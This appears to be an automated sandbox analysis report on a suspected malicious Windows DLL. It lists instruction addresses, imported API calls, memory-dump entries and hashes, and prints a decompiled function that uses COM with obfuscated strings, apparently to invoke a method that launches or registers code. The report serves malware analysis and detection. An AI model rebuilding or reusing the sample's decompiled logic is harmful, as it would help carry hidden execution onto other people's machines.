                                                                                                        0x70989a13
                                                                                                        0x70989a1e
                                                                                                        0x70989a20
                                                                                                        0x70989a23
                                                                                                        0x70989a23
                                                                                                        0x70989a25
                                                                                                        0x70989a2a
                                                                                                        0x70989a2c
                                                                                                        0x70989a2f
                                                                                                        0x70989a2f
                                                                                                        0x70989a31
                                                                                                        0x70989a36
                                                                                                        0x70989a38
                                                                                                        0x70989a3b
                                                                                                        0x70989a3b
                                                                                                        0x70989a3d
                                                                                                        0x70989a42
                                                                                                        0x70989a44
                                                                                                        0x70989a47
                                                                                                        0x70989a47
                                                                                                        0x70989a49
                                                                                                        0x70989a4e
                                                                                                        0x70989a50
                                                                                                        0x70989a53
                                                                                                        0x70989a53
                                                                                                        0x70989a55
                                                                                                        0x70989a5a
                                                                                                        0x70989a5c
                                                                                                        0x70989a5f
                                                                                                        0x70989a5f
                                                                                                        0x70989a61
                                                                                                        0x70989a66
                                                                                                        0x70989a68
                                                                                                        0x70989a6b
                                                                                                        0x70989a6b
                                                                                                        0x70989a6d
                                                                                                        0x70989a72
                                                                                                        0x70989a74
                                                                                                        0x70989a7b
                                                                                                        0x70989a7b
                                                                                                        0x70989a7d
                                                                                                        0x70989a82
                                                                                                        0x70989a84
                                                                                                        0x70989a87
                                                                                                        0x70989a87
                                                                                                        0x70989a8d
                                                                                                        0x70989a94
                                                                                                        0x70989a97
                                                                                                        0x70989a97
                                                                                                        0x70989a9c
                                                                                                        0x70989aa2
                                                                                                        0x70989aa4
                                                                                                        0x70989aa4
                                                                                                        0x70989aaf
                                                                                                        0x70989ab4
                                                                                                        0x70989ab4
                                                                                                        0x70989ab6
                                                                                                        0x70989ab8
                                                                                                        0x70989abb
                                                                                                        0x70989abb
                                                                                                        0x70989abd
                                                                                                        0x70989ac0
                                                                                                        0x70989ac0
                                                                                                        0x70989ac8
                                                                                                        0x70989acd
                                                                                                        0x70989acf
                                                                                                        0x70989ad3
                                                                                                        0x70989ad8
                                                                                                        0x70989ade
                                                                                                        0x70989ade
                                                                                                        0x70989acf
                                                                                                        0x00000000
                                                                                                        0x70988b08
                                                                                                        0x70988b09
                                                                                                        0x70989ae3
                                                                                                        0x70989aef
                                                                                                        0x70988b0f
                                                                                                        0x70988b17
                                                                                                        0x70988b31
                                                                                                        0x70988b36
                                                                                                        0x70988b43
                                                                                                        0x70988b4b
                                                                                                        0x70988b58
                                                                                                        0x70988b5b
                                                                                                        0x70988b5b
                                                                                                        0x70988b61
                                                                                                        0x70988b6e
                                                                                                        0x70988b7a
                                                                                                        0x70988b8a
                                                                                                        0x70988b9c
                                                                                                        0x70988ba4
                                                                                                        0x70988ba6
                                                                                                        0x70988baf
                                                                                                        0x70988bb8
                                                                                                        0x70988bbd
                                                                                                        0x70988bc2
                                                                                                        0x70988bc7
                                                                                                        0x70988bce
                                                                                                        0x70988bd4
                                                                                                        0x70988bda
                                                                                                        0x70988be1
                                                                                                        0x70988be3
                                                                                                        0x70988bea
                                                                                                        0x70988bf0
                                                                                                        0x70988c00
                                                                                                        0x70988c05
                                                                                                        0x70988c0d
                                                                                                        0x70988c17
                                                                                                        0x70988c2f
                                                                                                        0x70988c3d
                                                                                                        0x70988c46
                                                                                                        0x00000000
                                                                                                        0x70988c48
                                                                                                        0x70988c49
                                                                                                        0x70988c49
                                                                                                        0x70988c46
                                                                                                        0x70988c4f
                                                                                                        0x70988c59
                                                                                                        0x70988c62
                                                                                                        0x70988c67
                                                                                                        0x70988c6d
                                                                                                        0x70988c74
                                                                                                        0x70988c7f
                                                                                                        0x70988c84
                                                                                                        0x70988c93
                                                                                                        0x70988c98
                                                                                                        0x70988ca2
                                                                                                        0x70988cac
                                                                                                        0x70988cb8
                                                                                                        0x70988cbd
                                                                                                        0x70988cc2
                                                                                                        0x70988cc5
                                                                                                        0x70988cca
                                                                                                        0x70988cd0
                                                                                                        0x70988cdb
                                                                                                        0x70988ce3
                                                                                                        0x00000000
                                                                                                        0x70988ce9
                                                                                                        0x70988ce9
                                                                                                        0x70988cec
                                                                                                        0x70988cf4
                                                                                                        0x00000000
                                                                                                        0x70988cfa
                                                                                                        0x70988d00
                                                                                                        0x70988d08
                                                                                                        0x70988d09
                                                                                                        0x70988d0e
                                                                                                        0x70988d10
                                                                                                        0x70988d11
                                                                                                        0x70988d12
                                                                                                        0x70988d19
                                                                                                        0x70988d20
                                                                                                        0x70988d27
                                                                                                        0x70988d61
                                                                                                        0x70988d29
                                                                                                        0x70988d33
                                                                                                        0x70988d35
                                                                                                        0x70988d3c
                                                                                                        0x70988d44
                                                                                                        0x70988d4c
                                                                                                        0x70988d54
                                                                                                        0x70988d56
                                                                                                        0x70988d5c
                                                                                                        0x70988d5c
                                                                                                        0x70988d54
                                                                                                        0x70988d3c
                                                                                                        0x70988d6b
                                                                                                        0x70988d74
                                                                                                        0x70988d75
                                                                                                        0x70988d7a
                                                                                                        0x70988d7c
                                                                                                        0x70988d7d
                                                                                                        0x70988d7e
                                                                                                        0x70988d85
                                                                                                        0x70988d8c
                                                                                                        0x70988dc9
                                                                                                        0x70988d8e
                                                                                                        0x70988d98
                                                                                                        0x70988d9a
                                                                                                        0x70988da1
                                                                                                        0x70988dab
                                                                                                        0x70988db3
                                                                                                        0x70988dbb
                                                                                                        0x70988dbd
                                                                                                        0x70988dc4
                                                                                                        0x70988dc4
                                                                                                        0x70988dbb
                                                                                                        0x70988da1
                                                                                                        0x70988dd3
                                                                                                        0x70988dd9
                                                                                                        0x70988de6
                                                                                                        0x70988dec
                                                                                                        0x70988df5
                                                                                                        0x70988df7
                                                                                                        0x70988dfe
                                                                                                        0x70988e0f
                                                                                                        0x70988e19
                                                                                                        0x70988e1a
                                                                                                        0x70988e1f
                                                                                                        0x70988e27
                                                                                                        0x70988e29
                                                                                                        0x70988e31
                                                                                                        0x70988e37
                                                                                                        0x70988e3d
                                                                                                        0x70988e40
                                                                                                        0x70988e40
                                                                                                        0x70988e4e
                                                                                                        0x70988e5e
                                                                                                        0x70988e63
                                                                                                        0x70988e78
                                                                                                        0x70988e85
                                                                                                        0x70988e95
                                                                                                        0x70988ea5
                                                                                                        0x70988eb5
                                                                                                        0x70988ec5
                                                                                                        0x70988ed5
                                                                                                        0x70988ee8
                                                                                                        0x70988ef8
                                                                                                        0x70988f08
                                                                                                        0x70988f18
                                                                                                        0x70988f28
                                                                                                        0x70988f38
                                                                                                        0x70988f48
                                                                                                        0x70988f58
                                                                                                        0x70988f6b
                                                                                                        0x70988f70
                                                                                                        0x70988f79
                                                                                                        0x70988f8a
                                                                                                        0x70988f95
                                                                                                        0x70988faa
                                                                                                        0x70988fba
                                                                                                        0x70988fca
                                                                                                        0x70988fcf
                                                                                                        0x70988fd4
                                                                                                        0x70988fd7
                                                                                                        0x70988fdc
                                                                                                        0x70988fe2
                                                                                                        0x70988fe8
                                                                                                        0x70988ff2
                                                                                                        0x70988ff6
                                                                                                        0x70989000
                                                                                                        0x70989006
                                                                                                        0x7098900d
                                                                                                        0x7098900f
                                                                                                        0x70989014
                                                                                                        0x70989019
                                                                                                        0x70989042
                                                                                                        0x70989042
                                                                                                        0x70989046
                                                                                                        0x70989049
                                                                                                        0x7098904c
                                                                                                        0x70989060
                                                                                                        0x70989060
                                                                                                        0x70989063
                                                                                                        0x70989065
                                                                                                        0x70989069
                                                                                                        0x7098906b
                                                                                                        0x7098906b
                                                                                                        0x70989069
                                                                                                        0x7098904e
                                                                                                        0x7098904e
                                                                                                        0x70989052
                                                                                                        0x00000000
                                                                                                        0x70989054
                                                                                                        0x70989054
                                                                                                        0x70989054
                                                                                                        0x70989052
                                                                                                        0x7098901b
                                                                                                        0x7098901b
                                                                                                        0x70989023
                                                                                                        0x00000000
                                                                                                        0x7098902b
                                                                                                        0x7098902b
                                                                                                        0x7098902f
                                                                                                        0x70989031
                                                                                                        0x70989037
                                                                                                        0x7098903b
                                                                                                        0x7098903b
                                                                                                        0x70989023
                                                                                                        0x70989075
                                                                                                        0x70989076
                                                                                                        0x70989014
                                                                                                        0x7098907b
                                                                                                        0x7098907b
                                                                                                        0x70989081
                                                                                                        0x70989083
                                                                                                        0x70989088
                                                                                                        0x7098908d
                                                                                                        0x70989096
                                                                                                        0x7098909b
                                                                                                        0x709890a0
                                                                                                        0x709890a6
                                                                                                        0x709890af
                                                                                                        0x709890c6
                                                                                                        0x709890cb
                                                                                                        0x709890d1
                                                                                                        0x709890d9
                                                                                                        0x709890df
                                                                                                        0x709890e9
                                                                                                        0x709890ef
                                                                                                        0x709890fc
                                                                                                        0x70989101
                                                                                                        0x70989109
                                                                                                        0x70989117
                                                                                                        0x70989119
                                                                                                        0x7098911e
                                                                                                        0x70989124
                                                                                                        0x70989125
                                                                                                        0x70989126
                                                                                                        0x7098912a
                                                                                                        0x70989132
                                                                                                        0x70989136
                                                                                                        0x7098913a
                                                                                                        0x7098913e
                                                                                                        0x70989143
                                                                                                        0x70989147
                                                                                                        0x7098914c
                                                                                                        0x7098914e
                                                                                                        0x7098914e
                                                                                                        0x70989159
                                                                                                        0x7098915e
                                                                                                        0x7098916d
                                                                                                        0x7098916e
                                                                                                        0x70989187
                                                                                                        0x70989189
                                                                                                        0x70989194
                                                                                                        0x7098919a
                                                                                                        0x709891a6
                                                                                                        0x709891a9
                                                                                                        0x709891a9
                                                                                                        0x709891af
                                                                                                        0x709891bd
                                                                                                        0x709891c7
                                                                                                        0x709891cc
                                                                                                        0x709891d2
                                                                                                        0x709891d3
                                                                                                        0x709891d4
                                                                                                        0x709891dc
                                                                                                        0x709891e0
                                                                                                        0x709891e4
                                                                                                        0x709891e8
                                                                                                        0x709891ed
                                                                                                        0x709891f1
                                                                                                        0x709891f6
                                                                                                        0x709891f8
                                                                                                        0x709891f8
                                                                                                        0x7098920e
                                                                                                        0x70989216
                                                                                                        0x7098921e
                                                                                                        0x70989226
                                                                                                        0x7098922a
                                                                                                        0x70989232
                                                                                                        0x7098923a
                                                                                                        0x70989242
                                                                                                        0x70989246
                                                                                                        0x7098924e
                                                                                                        0x70989256
                                                                                                        0x7098925e
                                                                                                        0x70989262
                                                                                                        0x7098926a
                                                                                                        0x70989272
                                                                                                        0x7098927a
                                                                                                        0x7098927e
                                                                                                        0x70989286
                                                                                                        0x7098928e
                                                                                                        0x70989296
                                                                                                        0x7098929a
                                                                                                        0x7098929f
                                                                                                        0x7098929f
                                                                                                        0x709892b0
                                                                                                        0x709892b1
                                                                                                        0x709892b6
                                                                                                        0x709892c9
                                                                                                        0x709892cb
                                                                                                        0x709892d6
                                                                                                        0x709892dc
                                                                                                        0x709892e3
                                                                                                        0x709892f9
                                                                                                        0x70989304
                                                                                                        0x7098930f
                                                                                                        0x7098931a
                                                                                                        0x70989321
                                                                                                        0x7098932c
                                                                                                        0x70989337
                                                                                                        0x70989342
                                                                                                        0x70989349
                                                                                                        0x70989354
                                                                                                        0x7098935f
                                                                                                        0x7098936a
                                                                                                        0x70989371
                                                                                                        0x7098937c
                                                                                                        0x70989387
                                                                                                        0x70989392
                                                                                                        0x70989399
                                                                                                        0x709893a4
                                                                                                        0x709893af
                                                                                                        0x709893ba
                                                                                                        0x709893c1
                                                                                                        0x709893cc
                                                                                                        0x709893d7
                                                                                                        0x709893e2
                                                                                                        0x709893e9
                                                                                                        0x709893f4
                                                                                                        0x709893ff
                                                                                                        0x7098940a
                                                                                                        0x70989411
                                                                                                        0x7098941c
                                                                                                        0x70989427
                                                                                                        0x70989432
                                                                                                        0x70989439
                                                                                                        0x70989444
                                                                                                        0x7098944f
                                                                                                        0x7098945a
                                                                                                        0x70989461
                                                                                                        0x7098946c
                                                                                                        0x70989477
                                                                                                        0x70989482
                                                                                                        0x70989489
                                                                                                        0x70989494
                                                                                                        0x7098949f
                                                                                                        0x709894aa
                                                                                                        0x709894b1
                                                                                                        0x709894bc
                                                                                                        0x709894c7
                                                                                                        0x709894d2
                                                                                                        0x709894d9
                                                                                                        0x709894e4
                                                                                                        0x709894ef
                                                                                                        0x709894fa
                                                                                                        0x70989501
                                                                                                        0x7098950c
                                                                                                        0x70989517
                                                                                                        0x70989522
                                                                                                        0x70989529
                                                                                                        0x70989534
                                                                                                        0x7098953f
                                                                                                        0x7098954a
                                                                                                        0x70989551
                                                                                                        0x7098955c
                                                                                                        0x70989567
                                                                                                        0x70989572
                                                                                                        0x70989579
                                                                                                        0x70989584
                                                                                                        0x7098958f
                                                                                                        0x7098959a
                                                                                                        0x709895a1
                                                                                                        0x709895a6
                                                                                                        0x709895ac
                                                                                                        0x709895b1
                                                                                                        0x709895b6
                                                                                                        0x709895bb
                                                                                                        0x709895bf
                                                                                                        0x709895c2
                                                                                                        0x709895c7
                                                                                                        0x709895cb
                                                                                                        0x709895d0
                                                                                                        0x709895d5
                                                                                                        0x709895d9
                                                                                                        0x709895e6
                                                                                                        0x709895eb
                                                                                                        0x709895f0
                                                                                                        0x709895fc
                                                                                                        0x70989601
                                                                                                        0x70989606
                                                                                                        0x7098960c
                                                                                                        0x70989618
                                                                                                        0x7098961d
                                                                                                        0x70989623
                                                                                                        0x70989623
                                                                                                        0x7098962d
                                                                                                        0x70989632
                                                                                                        0x7098963b
                                                                                                        0x7098963c
                                                                                                        0x7098964f
                                                                                                        0x70989651
                                                                                                        0x7098965c
                                                                                                        0x70989662
                                                                                                        0x70989669
                                                                                                        0x7098967c
                                                                                                        0x70989684
                                                                                                        0x7098968c
                                                                                                        0x70989694
                                                                                                        0x70989698
                                                                                                        0x709896a0
                                                                                                        0x709896a8
                                                                                                        0x709896b0
                                                                                                        0x709896b4
                                                                                                        0x709896bc
                                                                                                        0x709896c4
                                                                                                        0x709896cc
                                                                                                        0x709896d0
                                                                                                        0x709896d8
                                                                                                        0x709896e0
                                                                                                        0x709896e8
                                                                                                        0x709896ec
                                                                                                        0x709896f1
                                                                                                        0x709896f1
                                                                                                        0x709896fa
                                                                                                        0x709896ff
                                                                                                        0x70989708
                                                                                                        0x70989709
                                                                                                        0x7098971c
                                                                                                        0x7098971e
                                                                                                        0x70989729
                                                                                                        0x7098972f
                                                                                                        0x70989736
                                                                                                        0x70989745
                                                                                                        0x7098974d
                                                                                                        0x70989755
                                                                                                        0x7098975d
                                                                                                        0x70989761
                                                                                                        0x70989769
                                                                                                        0x70989771
                                                                                                        0x70989779
                                                                                                        0x7098977d
                                                                                                        0x70989782
                                                                                                        0x70989782
                                                                                                        0x70989793
                                                                                                        0x70989794
                                                                                                        0x70989799
                                                                                                        0x709897ac
                                                                                                        0x709897ae
                                                                                                        0x709897b9
                                                                                                        0x709897bf
                                                                                                        0x709897c6
                                                                                                        0x709897d5
                                                                                                        0x709897dd
                                                                                                        0x709897e5
                                                                                                        0x709897ed
                                                                                                        0x709897f1
                                                                                                        0x709897f6
                                                                                                        0x709897f6
                                                                                                        0x709897ff
                                                                                                        0x70989804
                                                                                                        0x7098980d
                                                                                                        0x7098980e
                                                                                                        0x70989821
                                                                                                        0x70989823
                                                                                                        0x7098982e
                                                                                                        0x70989834
                                                                                                        0x7098983b
                                                                                                        0x70989850
                                                                                                        0x70989858
                                                                                                        0x70989860
                                                                                                        0x70989868
                                                                                                        0x7098986c
                                                                                                        0x70989871
                                                                                                        0x70989871
                                                                                                        0x70989882
                                                                                                        0x70989887
                                                                                                        0x70989896
                                                                                                        0x70989898
                                                                                                        0x70989899
                                                                                                        0x709898ac
                                                                                                        0x709898b2
                                                                                                        0x709898be
                                                                                                        0x709898cc
                                                                                                        0x709898d2
                                                                                                        0x709898d9
                                                                                                        0x709898e8
                                                                                                        0x709898f0
                                                                                                        0x709898f8
                                                                                                        0x70989900
                                                                                                        0x70989904
                                                                                                        0x70989909
                                                                                                        0x70989909
                                                                                                        0x7098990e
                                                                                                        0x70989916
                                                                                                        0x70989918
                                                                                                        0x70989921
                                                                                                        0x70989928
                                                                                                        0x70989937
                                                                                                        0x70989938
                                                                                                        0x70989948
                                                                                                        0x7098994b
                                                                                                        0x7098994b
                                                                                                        0x70989954
                                                                                                        0x7098996a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70988e4e
                                                                                                        0x70988cf4
                                                                                                        0x70988ce3
                                                                                                        0x70988b09

                                                                                                        APIs
                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 70988B17
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 70988B1E
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70988B3A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70988B43
                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000105), ref: 70988B50
                                                                                                        • ExitProcess.KERNEL32 ref: 70988B5B
                                                                                                        • PathAddBackslashW.SHLWAPI(00B63C90), ref: 70988B6E
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70988B77
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70988B7A
                                                                                                        • GetModuleFileNameW.KERNEL32(?,00000000,00000104), ref: 70988B8F
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70988BA1
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70988BA4
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00B757B8), ref: 70988BBD
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(00B757B8,00000000,00B757B8), ref: 70988BD4
                                                                                                        • PathAddBackslashW.SHLWAPI(00B757B8), ref: 70988BE1
                                                                                                        • SetCurrentDirectoryW.KERNEL32(00B757B8), ref: 70988BEA
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 70988C05
                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 70988C17
                                                                                                        • StrChrW.SHLWAPI(7098CE48,00000066), ref: 70988C20
                                                                                                        • lstrcatW.KERNEL32(?,00000000), ref: 70988C2F
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70988C3D
                                                                                                        • ExitProcess.KERNEL32 ref: 70988C49
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00B63C90), ref: 70989984
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70989987
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00B757B8), ref: 70989994
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70989997
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00B7C4E8), ref: 709899A4
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709899A7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00B52C80), ref: 709899B4
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709899B7
                                                                                                        • WTSFreeMemory.WTSAPI32(00B76080), ref: 709899CB
                                                                                                        • WTSFreeMemory.WTSAPI32(00B71E90), ref: 709899EA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00B7EA60), ref: 70989A02
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70989A05
                                                                                                        • FreeLibrary.KERNEL32(6CAF0000), ref: 70989A23
                                                                                                        • FreeLibrary.KERNEL32(77400000), ref: 70989A2F
                                                                                                        • FreeLibrary.KERNEL32(760B0000), ref: 70989A3B
                                                                                                        • FreeLibrary.KERNEL32(75D50000), ref: 70989A47
                                                                                                        • FreeLibrary.KERNEL32(73DE0000), ref: 70989A53
                                                                                                        • FreeLibrary.KERNEL32(75EC0000), ref: 70989A5F
                                                                                                        • FreeLibrary.KERNEL32(708C0000), ref: 70989A6B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Free$Process$Library$Path$AllocBackslashFileMemory$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleMoveNameRemoveSpecSpecialSystemThreadlstrcat
                                                                                                        • String ID: 8?x$PBx$\dx$g
                                                                                                        • API String ID: 3911766576-1573909000
                                                                                                        • Opcode ID: ff3428f451c05731e8782d0e3f1fa42d3d3d70a01c623387e74d06210e88188e
                                                                                                        • Instruction ID: cbb41231afa4e48f1977ab050944e11eef4408d2a519d3023064fb1959dbfdce
                                                                                                        • Opcode Fuzzy Hash: ff3428f451c05731e8782d0e3f1fa42d3d3d70a01c623387e74d06210e88188e
                                                                                                        • Instruction Fuzzy Hash: 44825AB2518344AFC3209F66CC99B6F7BA8FB94344F20992DF15A973E0E7749400DB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982AC0, Relevance: 42.3, APIs: 28, Instructions: 338memorycomstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 39%
                                                                                                        			E70982AC0() {
				intOrPtr _v56;
				char _v76;
				intOrPtr* _v100;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v132;
				intOrPtr* _v140;
				intOrPtr _v160;
				intOrPtr _v172;
				intOrPtr _v184;
				void* _v192;
				intOrPtr* _v200;
				intOrPtr _v208;
				intOrPtr _v212;
				char _v216;
				short _v220;
				intOrPtr* _v232;
				intOrPtr _v236;
				WCHAR* _v244;
				intOrPtr* _v252;
				void* _v256;
				intOrPtr* _v272;
				intOrPtr _v276;
				char _v288;
				intOrPtr* _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				short _v308;
				intOrPtr* _v312;
				intOrPtr* _v320;
				intOrPtr* _v324;
				char _v328;
				char _v336;
				intOrPtr* _v340;
				intOrPtr _v344;
				intOrPtr* _v352;
				intOrPtr _v356;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr* _v380;
				char _v384;
				intOrPtr* _v408;
				intOrPtr _v412;
				intOrPtr _v420;
				intOrPtr* _v424;
				char* _t88;
				void* _t90;
				intOrPtr* _t91;
				void* _t92;
				intOrPtr* _t93;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t100;
				intOrPtr* _t101;
				void* _t103;
				void* _t105;
				intOrPtr* _t106;
				void* _t108;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t114;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				char _t133;
				intOrPtr _t139;
				WCHAR* _t145;
				intOrPtr* _t146;
				void* _t147;
				intOrPtr* _t150;
				void* _t158;
				intOrPtr _t161;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr _t166;
				void* _t220;
				intOrPtr* _t221;
				void* _t223;
				WCHAR* _t226;
				intOrPtr _t228;
				void* _t230;
				WCHAR* _t232;
				intOrPtr* _t233;
				char _t235;

				_v56 = 0;
				__imp__CoInitializeEx(0, 6); // executed
				_t88 =  &_v76;
				_v76 = 0;
				__imp__CoCreateInstance(0x7098d35c, 0, 1, 0x7098d28c, _t88); // executed
				if(_t88 < 0) {
					return 0;
				} else {
					_t166 =  *0x7098f614; // 0x787680
					_t221 = __imp__#2;
					_v116 = 0;
					_t90 =  *_t221(_t166, _t220, _t158);
					_t230 = _t90;
					_t91 = _v100;
					_t92 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0xc))))(_t91, _t230, 0, 0, 0, 0, 0, 0,  &_v120); // executed
					__imp__#6(_t230);
					if(_t92 >= 0) {
						_t96 = _v160;
						__imp__CoSetProxyBlanket(_t96, 0xa, 0, 0, 3, 3, 0, 0); // executed
						if(_t96 >= 0) {
							_v184 = 0;
							_t100 =  *_t221(StrChrW(0x7098c638, 0x57));
							_t161 = _t100;
							_t101 = _v200;
							_v172 = _t161;
							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0x18))))(_t101, _t161, 0, 0,  &_v192, 0); // executed
							if(_t103 >= 0) {
								_v208 = 0;
								_t105 =  *_t221(StrChrW(0x7098c60c, 0x57));
								_t223 = _t105;
								_t106 = _v232;
								_t108 =  *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x18))))(_t106, _t223, 0, 0,  &_v216, 0);
								__imp__#6(_t223);
								if(_t108 >= 0) {
									_t111 = _v244;
									_push( &_v256);
									_v256 = 0;
									_push(0);
									_push(_t111);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x3c))))() >= 0) {
										_t163 = __imp__#8;
										 *_t163( &_v216);
										_v220 = 2;
										_v212 = 1;
										 *((intOrPtr*)( *((intOrPtr*)( *_v272 + 0x14))))(_v276, StrChrW(0x7098c5f4, 0x53), 0,  &_v220, 0); // executed
										_push(0);
										_push( &_v288);
										_push(0);
										_v288 = 0;
										_push(StrChrW(0x7098c5e4, 0x43));
										_push(_v296);
										if( *((intOrPtr*)( *((intOrPtr*)( *_v292 + 0x4c))))() >= 0) {
											_t126 = _v312;
											_push( &_v328);
											_v328 = 0;
											_push(0);
											_push(_t126);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x3c))))() >= 0) {
												_t226 = _v244;
												if(_t226 != 0) {
													_t133 = lstrlenW(_t226) + 2;
													__imp__#4(_t226, _t133);
													_t235 = _t133;
													if(_t235 != 0) {
														 *_t163( &_v304);
														_v308 = 8;
														_v300 = _t235;
														 *((intOrPtr*)( *((intOrPtr*)( *_v352 + 0x14))))(_v356, StrChrW(0x7098c5c8, 0x43), 0,  &_v308, 0);
														_t139 = _v276;
														_t228 = 0;
														if(_t139 != 0) {
															__imp__#2(_t139);
															_t228 = _t139;
															if(_t228 != 0) {
																_v336 = 8;
																_v328 = _t228;
																_v340 =  *_v380;
																 *((intOrPtr*)( *((intOrPtr*)(_v344 + 0x14))))(_v384, StrChrW(0x7098c5a4, 0x43), 0,  &_v336, 0);
															}
														}
														 *_t163( &_v300);
														_v304 = 9;
														_v296 = _v372;
														 *((intOrPtr*)( *((intOrPtr*)( *_v380 + 0x14))))(_v384, StrChrW(0x7098c56c, 0x50), 0,  &_v304, 0); // executed
														_v376 = 0;
														_t145 = StrChrW(0x7098c5e4, 0x43);
														__imp__#2(_t145);
														_t232 = _t145;
														_t146 = _v408;
														_t147 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x60))))(_t146, _v380, _t232, 0, 0, _v412,  &_v384, 0);
														_t233 = __imp__#6;
														_t165 = _t147;
														 *_t233(_t232);
														 *_t233(_t235);
														if(_t228 != 0) {
															 *_t233(_t228);
														}
														if(_t165 >= 0) {
															_t150 = _v424;
															 *((intOrPtr*)( *((intOrPtr*)( *_t150 + 8))))(_t150);
															_v420 = 1;
														}
													}
												}
												_t130 = _v340;
												 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 8))))(_t130);
											}
											_t128 = _v324;
											 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))(_t128);
										}
										_t124 = _v320;
										 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
									}
									_t114 = _v256;
									 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 8))))(_t114);
								}
								_t109 = _v252;
								 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 8))))(_t109);
								_t161 = _v236;
							}
							__imp__#6(_t161);
						}
						_t97 = _v192;
						 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))(_t97);
					}
					_t93 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
					return _v132;
				}
			}

























































































                                                                                                        0x70982acc
                                                                                                        0x70982ad0
                                                                                                        0x70982ad6
                                                                                                        0x70982ae8
                                                                                                        0x70982aec
                                                                                                        0x70982af4
                                                                                                        0x70982e46
                                                                                                        0x70982afa
                                                                                                        0x70982afa
                                                                                                        0x70982b02
                                                                                                        0x70982b09
                                                                                                        0x70982b0d
                                                                                                        0x70982b19
                                                                                                        0x70982b1b
                                                                                                        0x70982b27
                                                                                                        0x70982b2c
                                                                                                        0x70982b34
                                                                                                        0x70982b3a
                                                                                                        0x70982b49
                                                                                                        0x70982b51
                                                                                                        0x70982b64
                                                                                                        0x70982b6b
                                                                                                        0x70982b74
                                                                                                        0x70982b76
                                                                                                        0x70982b82
                                                                                                        0x70982b86
                                                                                                        0x70982b8a
                                                                                                        0x70982b97
                                                                                                        0x70982b9e
                                                                                                        0x70982ba7
                                                                                                        0x70982ba9
                                                                                                        0x70982bb5
                                                                                                        0x70982bba
                                                                                                        0x70982bc2
                                                                                                        0x70982bc8
                                                                                                        0x70982bd0
                                                                                                        0x70982bd1
                                                                                                        0x70982bd7
                                                                                                        0x70982bd8
                                                                                                        0x70982be0
                                                                                                        0x70982be6
                                                                                                        0x70982bf1
                                                                                                        0x70982c05
                                                                                                        0x70982c0a
                                                                                                        0x70982c24
                                                                                                        0x70982c2a
                                                                                                        0x70982c2f
                                                                                                        0x70982c30
                                                                                                        0x70982c33
                                                                                                        0x70982c43
                                                                                                        0x70982c48
                                                                                                        0x70982c4d
                                                                                                        0x70982c53
                                                                                                        0x70982c5b
                                                                                                        0x70982c5c
                                                                                                        0x70982c65
                                                                                                        0x70982c66
                                                                                                        0x70982c6b
                                                                                                        0x70982c71
                                                                                                        0x70982c77
                                                                                                        0x70982c84
                                                                                                        0x70982c89
                                                                                                        0x70982c8f
                                                                                                        0x70982c93
                                                                                                        0x70982cac
                                                                                                        0x70982cc2
                                                                                                        0x70982cc7
                                                                                                        0x70982cdd
                                                                                                        0x70982cdf
                                                                                                        0x70982ce3
                                                                                                        0x70982ce7
                                                                                                        0x70982cea
                                                                                                        0x70982cf0
                                                                                                        0x70982cf4
